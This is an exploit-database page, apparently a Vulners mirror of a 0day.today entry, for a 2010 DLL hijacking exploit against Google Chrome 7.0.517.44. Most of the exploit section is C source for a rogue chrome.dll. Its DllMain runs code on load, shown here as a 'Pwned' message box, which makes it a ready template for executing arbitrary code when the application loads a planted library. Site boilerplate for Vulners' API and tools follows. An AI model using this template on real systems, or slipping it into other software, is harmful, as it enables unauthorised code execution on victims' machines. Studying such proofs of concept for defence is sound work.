Lucene search
K

Google Chrome 7.0.517.44 DLL Hijacking Exploit (chrome.dll)

🗓️ 20 Nov 2010 00:00:00Reported by PoisonCodeType 
zdt
 zdt
🔗 0day.today👁 17 Views

Google Chrome 7.0.517.44 DLL Hijacking Exploi

Code
==========================================================
Google Chrome 7.0.517.44 DLL Hijacking Exploit(chrome.dll)
==========================================================

# Title: Google Chrome 7.0.517.44 DLL Hijacking Exploit(chrome.dll)
# Software:http://www.google.com/chrome/
# Version: 7.0.517.44
# Tested on: Windows
# Author: PoisonCode
# Email:  [email protected]
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Nov 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
17